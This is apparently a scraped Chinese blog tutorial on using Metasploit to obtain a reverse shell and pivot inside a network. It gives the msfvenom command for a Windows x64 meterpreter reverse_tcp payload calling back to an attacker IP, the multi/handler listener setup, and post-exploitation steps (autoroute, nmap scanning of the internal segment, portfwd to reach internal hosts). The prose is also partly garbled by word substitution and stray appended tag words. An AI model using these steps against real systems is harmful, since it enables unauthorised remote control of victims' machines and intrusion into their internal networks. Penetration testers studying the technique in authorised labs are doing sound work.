msf监听php反弹shell,使用msf进行反弹shell+内网渗透

首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令

反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。

1、反弹shell:

1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令以下:“msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(这里指代的是攻击机ip) lport=xxxx(这里指代的是攻击机的监听端口)-f exe(这里指代的是可执行文件的类型)-o xx.exe”。便可建立被控端的客户端文件。web

2.在攻击机的msf中启动监听模块,use exploit/multi/handler,并设置相应的payload,payload的选择取决于生成被控端文件用了什么模块,名字都是同样的。接着options设置好相应的参数。在这里须要指出的是,msfconsole必定要在root权限下执行。shell

3.接下来将生成的被控端文件放到靶机内,并在靶机内执行。msf就能够收到靶机的session,在msf中使用sessions命令便可看到当前收到的session,并使用session 1就能够取得第一个session的会话,呼出meterpreter模块,在meterpreter模块中输入shell便可实现反弹shell。windows

2、内网渗透

1.在达成以上步骤后,便可添加路由,添加路由使用msf自动添加便可。具体命令为:run post/multi/manage/autoroute。浏览器

2.路由设置完毕后,便可使用ifconfig或是ipconfig探测靶机的ip状况,并使用nmap等扫描工具,对其所在的网段进行扫描。进而发现其余内网中的靶机。session

3.若咱们发现了一个主机开放了80端口,咱们能够想象这个主机开放了web服务,此时要对此端口进行端口转发,那么咱们能够在meterpreter下使用msf自带的端口转发服务,具体命令以下:“portfwd add -l xxxx(本机待转发端口) -r xxx.xxx.xxx.xxx(待转发的内网主机地址) -p xxxx(待转发的内网主机端口)”。便可实现将内网主机的端口转发到本地某端口上,并能够在本地浏览器中输入localhost:xxxx进行访问并做进一步的渗透。tcp

你可能感兴趣的:(msf监听php反弹shell)